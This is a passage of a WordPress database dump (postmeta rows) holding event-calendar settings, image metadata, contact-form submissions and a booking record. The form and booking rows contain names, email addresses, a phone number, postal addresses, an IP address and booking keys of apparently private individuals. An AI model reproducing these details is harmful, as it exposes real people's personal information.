/>\r\n%%blog_name%%</p>\";}}'),(178081,268150,'mec_event_status','EventScheduled'),(178082,268150,'mec_moved_online_link',''),(178083,268150,'mec_cancelled_reason',''),(178084,268150,'mec_display_cancellation_reason_in_single_page',''),(178085,268150,'protect_children',''),(178086,268150,'passster_activate_global_protection',NULL),(178087,268150,'passster_activate_protection',NULL),(178088,268150,'passster_protection_type','password'),(178089,268150,'boldgrid_hide_page_title','0'),(178090,268150,'_thumbnail_id','267220'),(178093,268150,'_dp_original','266311'),(178092,268150,'boldgrid_in_page_containers','1'),(178094,268150,'_edit_lock','1677857759:2'),(178095,268150,'passster_area_shortcode',''),(178096,268150,'_edit_last','2'),(178097,268151,'_wp_attached_file','2023/03/sunset-shell-2.jpg'),(178098,268151,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:795;s:6:\"height\";i:447;s:4:\"file\";s:26:\"2023/03/sunset-shell-2.jpg\";s:8:\"filesize\";i:54275;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"sunset-shell-2-350x196.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11650;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"sunset-shell-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4754;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"sunset-shell-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42268;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:26:\"sunset-shell-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14412;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:26:\"sunset-shell-2-500x447.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:447;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31677;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:26:\"sunset-shell-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22411;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:26:\"sunset-shell-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15871;}s:8:\"tileview\";a:5:{s:4:\"file\";s:26:\"sunset-shell-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18019;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(178099,268119,'original-file','2023/03/free-eck-books-bk-updraft-pre-smush-original.jpg'),(178100,268119,'smush-complete','1'),(178101,268119,'smush-info','The file was compressed from 34.72 KB to 33.24 KB saving 4.26 percent using WP-Optimize'),(178102,268119,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:35554;s:12:\"smushed-size\";i:34039;s:15:\"savings-percent\";d:4.26;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:35554;s:10:\"compressed\";i:34039;}s:6:\"medium\";a:2:{s:8:\"original\";i:8011;s:10:\"compressed\";i:7945;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:3844;s:10:\"compressed\";i:3778;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:12350;s:10:\"compressed\";i:12350;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:20015;s:10:\"compressed\";i:20015;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:14035;s:10:\"compressed\";i:14035;}s:8:\"tileview\";a:2:{s:8:\"original\";i:15190;s:10:\"compressed\";i:15190;}}}'),(178103,268151,'original-file','2023/03/sunset-shell-2-updraft-pre-smush-original.jpg'),(178104,268151,'smush-complete','1'),(178105,268151,'smush-info','The file was compressed from 50.05 KB to 48.76 KB saving 2.57 percent using WP-Optimize'),(178106,268151,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:51248;s:12:\"smushed-size\";i:49933;s:15:\"savings-percent\";d:2.57;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:51248;s:10:\"compressed\";i:49933;}s:6:\"medium\";a:2:{s:8:\"original\";i:9602;s:10:\"compressed\";i:9536;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:4756;s:10:\"compressed\";i:4690;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:14420;s:10:\"compressed\";i:14420;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:22453;s:10:\"compressed\";i:22453;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:15868;s:10:\"compressed\";i:15868;}s:8:\"tileview\";a:2:{s:8:\"original\";i:18157;s:10:\"compressed\";i:18157;}}}'),(178107,268118,'original-file','2023/03/free-eck-books-lg-2-updraft-pre-smush-original.png'),(178108,268118,'smush-complete','1'),(178109,268118,'smush-info','The file was compressed from 60.10 KB to 15.81 KB saving 73.7 percent using WP-Optimize'),(178110,268118,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:61539;s:12:\"smushed-size\";i:16185;s:15:\"savings-percent\";d:73.7;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:61539;s:10:\"compressed\";i:16185;}s:6:\"medium\";a:2:{s:8:\"original\";i:48806;s:10:\"compressed\";i:15792;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:21561;s:10:\"compressed\";i:7577;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:51054;s:10:\"compressed\";i:16030;}}}'),(178111,268152,'_field_30','Jack'),(178112,268152,'_field_31','Lile'),(178113,268152,'_field_32','(303) 483-8552'),(178114,268152,'_field_33','bluehuuron@yahoo.com'),(178115,268152,'_field_34','6182 S. Marion Way'),(178116,268152,'_field_35','Centennial'),(178117,268152,'_field_36','CO'),(178118,268152,'_field_37','US'),(178119,268152,'_field_39','My address on the mailing label for registration to the HI conference was incorrect as:\n6128 S. Marion Way\n\nA transposition of two numbers but I still got it. :-)'),(178120,268152,'_form_id','4'),(178121,268152,'_seq_num','30'),(178122,268155,'_field_30','brian'),(178123,268155,'_field_31','wright'),(178124,268155,'_field_32',''),(178125,268155,'_field_33','bw68@rocketmail.com'),(178126,268155,'_field_34','p.o. box 547'),(178127,268155,'_field_35',''),(178128,268155,'_field_36','MS'),(178129,268155,'_field_37','US'),(178130,268155,'_field_39',''),(178131,268155,'_form_id','4'),(178132,268155,'_seq_num','31'),(178133,268156,'_field_30','brian'),(178134,268156,'_field_31','wright'),(178135,268156,'_field_32',''),(178136,268156,'_field_33','bw68@rocketmail.com'),(178137,268156,'_field_34','p.o. box 547'),(178138,268156,'_field_35','chanhassen'),(178139,268156,'_field_36','MN'),(178140,268156,'_field_37','US'),(178141,268156,'_field_39','Please send information on the upcoming Chela retreat. I am interested in attending. Thank you.'),(178142,268156,'_form_id','4'),(178143,268156,'_seq_num','32'),(178144,268157,'protect_children',''),(178145,268157,'mec_color',''),(178146,268157,'mec_location_id','171'),(178147,268157,'mec_dont_show_map','0'),(178148,268157,'mec_organizer_id','1'),(178149,268157,'mec_read_more',''),(178150,268157,'mec_more_info',''),(178151,268157,'mec_more_info_title',''),(178152,268157,'mec_more_info_target','_self'),(178153,268157,'mec_cost',''),(178154,268157,'mec_currency','a:0:{}'),(178155,268157,'mec_additional_organizer_ids','a:0:{}'),(178156,268157,'mec_additional_location_ids','a:0:{}'),(178157,268157,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-20\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-20\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(178158,268157,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(178159,268157,'mec_certain_weekdays','a:0:{}'),(178160,268157,'mec_allday','0'),(178161,268157,'one_occurrence','0'),(178162,268157,'mec_hide_time','0'),(178163,268157,'mec_hide_end_time','0'),(178164,268157,'mec_comment',''),(178165,268157,'mec_timezone','global'),(178166,268157,'mec_countdown_method','global'),(178167,268157,'mec_public','1'),(178168,268157,'mec_start_date','2023-04-20'),(178169,268157,'mec_start_time_hour','7'),(178170,268157,'mec_start_time_minutes','0'),(178171,268157,'mec_start_time_ampm','PM'),(178172,268157,'mec_start_day_seconds','68400'),(178173,268157,'mec_end_date','2023-04-20'),(178174,268157,'mec_end_time_hour','8'),(178175,268157,'mec_end_time_minutes','0'),(178176,268157,'mec_end_time_ampm','PM'),(178177,268157,'mec_end_day_seconds','72000'),(178178,268157,'mec_repeat_status','0'),(178179,268157,'mec_repeat_type',''),(178180,268157,'mec_repeat_interval','1'),(178181,268157,'mec_repeat_end',''),(178182,268157,'mec_repeat_end_at_occurrences',''),(178183,268157,'mec_repeat_end_at_date',''),(178184,268157,'mec_advanced_days','a:0:{}'),(178185,268157,'mec_in_days',''),(178186,268157,'mec_not_in_days',''),(178187,268157,'mec_hourly_schedules','a:0:{}'),(178188,268157,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(178189,268157,'mec_tickets','a:0:{}'),(178190,268157,'mec_fees_global_inheritance','1'),(178191,268157,'mec_fees','a:0:{}'),(178192,268157,'mec_ticket_variations_global_inheritance','1'),(178193,268157,'mec_ticket_variations','a:0:{}'),(178194,268157,'mec_reg_fields_global_inheritance','1'),(178195,268157,'mec_reg_fields','a:0:{}'),(178196,268157,'mec_bfixed_fields','a:0:{}'),(178197,268157,'mec_op','a:0:{}'),(178198,268157,'mec_fields','a:0:{}'),(178199,268157,'mec_event_status','EventScheduled'),(178200,268157,'mec_moved_online_link',''),(178201,268157,'mec_cancelled_reason',''),(178202,268157,'mec_display_cancellation_reason_in_single_page',''),(178203,268157,'boldgrid_hide_page_title','0'),(178204,268157,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(178205,268157,'passster_activate_global_protection',NULL),(178206,268157,'passster_activate_protection',NULL),(178207,268157,'passster_protection_type','password'),(178208,268157,'boldgrid_in_page_containers','1'),(178210,268157,'_dp_original','267696'),(178211,268157,'_edit_lock','1678249125:2'),(178212,268157,'passster_area_shortcode',''),(178213,268157,'_edit_last','2'),(178214,268157,'_thumbnail_id','266677'),(178215,268159,'protect_children',''),(178216,268159,'mec_color',''),(178217,268159,'mec_location_id','171'),(178218,268159,'mec_dont_show_map','0'),(178219,268159,'mec_organizer_id','1'),(178220,268159,'mec_read_more',''),(178221,268159,'mec_more_info',''),(178222,268159,'mec_more_info_title',''),(178223,268159,'mec_more_info_target','_self'),(178224,268159,'mec_cost',''),(178225,268159,'mec_currency','a:0:{}'),(178226,268159,'mec_additional_organizer_ids','a:0:{}'),(178227,268159,'mec_additional_location_ids','a:0:{}'),(178228,268159,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-03-16\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-03-16\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(178229,268159,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(178230,268159,'mec_certain_weekdays','a:0:{}'),(178231,268159,'mec_allday','0'),(178232,268159,'one_occurrence','0'),(178233,268159,'mec_hide_time','0'),(178234,268159,'mec_hide_end_time','0'),(178235,268159,'mec_comment',''),(178236,268159,'mec_timezone','global'),(178237,268159,'mec_countdown_method','global'),(178238,268159,'mec_public','1'),(178239,268159,'mec_start_date','2023-03-16'),(178240,268159,'mec_start_time_hour','7'),(178241,268159,'mec_start_time_minutes','0'),(178242,268159,'mec_start_time_ampm','PM'),(178243,268159,'mec_start_day_seconds','68400'),(178244,268159,'mec_end_date','2023-03-16'),(178245,268159,'mec_end_time_hour','8'),(178246,268159,'mec_end_time_minutes','0'),(178247,268159,'mec_end_time_ampm','PM'),(178248,268159,'mec_end_day_seconds','72000'),(178249,268159,'mec_repeat_status','0'),(178250,268159,'mec_repeat_type',''),(178251,268159,'mec_repeat_interval','1'),(178252,268159,'mec_repeat_end',''),(178253,268159,'mec_repeat_end_at_occurrences',''),(178254,268159,'mec_repeat_end_at_date',''),(178255,268159,'mec_advanced_days','a:0:{}'),(178256,268159,'mec_in_days',''),(178257,268159,'mec_not_in_days',''),(178258,268159,'mec_hourly_schedules','a:0:{}'),(178259,268159,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(178260,268159,'mec_tickets','a:0:{}'),(178261,268159,'mec_fees_global_inheritance','1'),(178262,268159,'mec_fees','a:0:{}'),(178263,268159,'mec_ticket_variations_global_inheritance','1'),(178264,268159,'mec_ticket_variations','a:0:{}'),(178265,268159,'mec_reg_fields_global_inheritance','1'),(178266,268159,'mec_reg_fields','a:0:{}'),(178267,268159,'mec_bfixed_fields','a:0:{}'),(178268,268159,'mec_op','a:0:{}'),(178269,268159,'mec_fields','a:0:{}'),(178270,268159,'mec_event_status','EventScheduled'),(178271,268159,'mec_moved_online_link',''),(178272,268159,'mec_cancelled_reason',''),(178273,268159,'mec_display_cancellation_reason_in_single_page',''),(178274,268159,'boldgrid_hide_page_title','0'),(178275,268159,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(178276,268159,'passster_activate_global_protection',NULL),(178277,268159,'passster_activate_protection',NULL),(178278,268159,'passster_protection_type','password'),(178279,268159,'boldgrid_in_page_containers','1'),(178283,268159,'_dp_original','268157'),(178281,268159,'passster_area_shortcode',''),(178282,268159,'_thumbnail_id','268042'),(178284,268159,'_edit_lock','1678249371:2'),(178285,268159,'_edit_last','2'),(178286,268160,'mec_transaction_id','PKA72335'),(178287,268160,'mec_user_id','1000022'),(178288,268160,'mec_verified','1'),(178289,268160,'mec_verification_key','fdc0736acad793a35714e11f5296f9af'),(178290,268160,'mec_cancellation_key','14b448ba46370855391b8e190a9604b6'),(178291,268160,'mec_confirmed','1'),(178292,268160,'mec_event_id','268025'),(178293,268160,'mec_date','1678012200:1678059000'),(178294,268160,'mec_ticket_id',',1,'),(178295,268160,'mec_booking_time','2023-03-05 08:53:39'),(178296,268160,'mec_all_dates','a:0:{}'),(178297,268160,'mec_other_dates','a:0:{}'),(178298,268160,'mec_attention_time','1678012200:1678059000'),(178299,268160,'mec_attention_time_start','1678012200'),(178300,268160,'mec_attention_time_end','1678059000'),(178301,268160,'mec_book_date_submit','20230305085339'),(178302,268160,'mec_booking_location','118'),(178303,268160,'mec_ticket_price_1','0'),(178304,268160,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"174.52.163.145\";}}'),(178305,268160,'mec_price','0'),(178306,268160,'mec_gateway','MEC_gateway_free'),(178307,268160,'mec_gateway_label','Free'),(178308,268161,'protect_children',''),(178309,268161,'mec_color',''),(178310,268161,'mec_location_id','131'),(178311,268161,'mec_dont_show_map','0'),(178312,268161,'mec_organizer_id','1'),(178313,268161,'mec_read_more',''),(178314,268161,'mec_more_info',''),(178315,268161,'mec_more_info_title',''),(178316,268161,'mec_more_info_target','_self'),(178317,268161,'mec_cost',''),(178318,268161,'mec_currency','a:0:{}'),(178319,268161,'mec_additional_organizer_ids','a:0:{}'),(178320,268161,'mec_additional_location_ids','a:0:{}'),(178321,268161,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-03-12\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-03-12\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(178322,268161,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(178323,268161,'mec_certain_weekdays','a:0:{}'),(178324,268161,'mec_allday','0'),(178325,268161,'one_occurrence','0'),(178326,268161,'mec_hide_time','0'),(178327,268161,'mec_hide_end_time','0'),(178328,268161,'mec_comment',''),(178329,268161,'mec_timezone','global'),(178330,268161,'mec_countdown_method','global'),(178331,268161,'mec_public','1'),(178332,268161,'mec_start_date','2023-03-12'),(178333,268161,'mec_start_time_hour','1'),(178334,268161,'mec_start_time_minutes','0'),(178335,268161,'mec_start_time_ampm','PM'),(178336,268161,'mec_start_day_seconds','46800'),(178337,268161,'mec_end_date','2023-03-12'),(178338,268161,'mec_end_time_hour','2'),(178339,268161,'mec_end_time_minutes','30'),(178340,268161,'mec_end_time_ampm','PM'),(178341,268161,'mec_end_day_seconds','52200'),(178342,268161,'mec_repeat_status','0'),(178343,268161,'mec_repeat_type',''),(178344,268161,'mec_repeat_interval','1'),(178345,268161,'mec_repeat_end',''),(178346,268161,'mec_repeat_end_at_occurrences',''),(178347,268161,'mec_repeat_end_at_date',''),(178348,268161,'mec_advanced_days','a:0:{}'),(178349,268161,'mec_in_days',''),(178350,268161,'mec_not_in_days',''),(178351,268161,'mec_hourly_schedules','a:0:{}'),(178352,268161,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(178353,268161,'mec_tickets','a:0:{}'),(178354,268161,'mec_fees_global_inheritance','1'),(178355,268161,'mec_fees','a:0:{}'),(178356,268161,'mec_ticket_variations_global_inheritance','1'),(178357,268161,'mec_ticket_variations','a:0:{}'),(178358,268161,'mec_reg_fields_global_inheritance','1'),(178359,268161,'mec_reg_fields','a:0:{}'),(178360,268161,'mec_bfixed_fields','a:0:{}'),(178361,268161,'mec_op','a:0:{}'),(178362,268161,'mec_fields','a:0:{}'),(178363,268161,'mec_event_status','EventScheduled'),(178364,268161,'mec_moved_online_link',''),(178365,268161,'mec_cancelled_reason',''),(178366,268161,'mec_display_cancellation_reason_in_single_page',''),(178367,268161,'boldgrid_hide_page_title','0'),(178368,268161,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(178369,268161,'passster_activate_global_protection',NULL),(178370,268161,'passster_activate_protection',NULL),(178371,268161,'passster_protection_type','password'),(178372,268161,'boldgrid_in_page_containers','1'),(178373,268161,'passster_area_shortcode',''),(178374,268161,'_thumbnail_id','268162'),(178376,268161,'_dp_original','268159'),(178377,268161,'_edit_lock','1678249269:2'),(178378,268161,'_edit_last','2'),(178379,268162,'_wp_attached_file','2023/03/HUBubble.webp'),(178380,268162,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:21:\"2023/03/HUBubble.webp\";s:8:\"filesize\";i:13944;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"HUBubble-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6712;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"HUBubble-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3868;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:21:\"HUBubble-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7842;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:21:\"HUBubble-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12106;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:21:\"HUBubble-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9620;}s:8:\"tileview\";a:5:{s:4:\"file\";s:21:\"HUBubble-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9038;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(178381,268162,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2023/03/HUBubble.webp - cannot be optimized, it has an invalid file 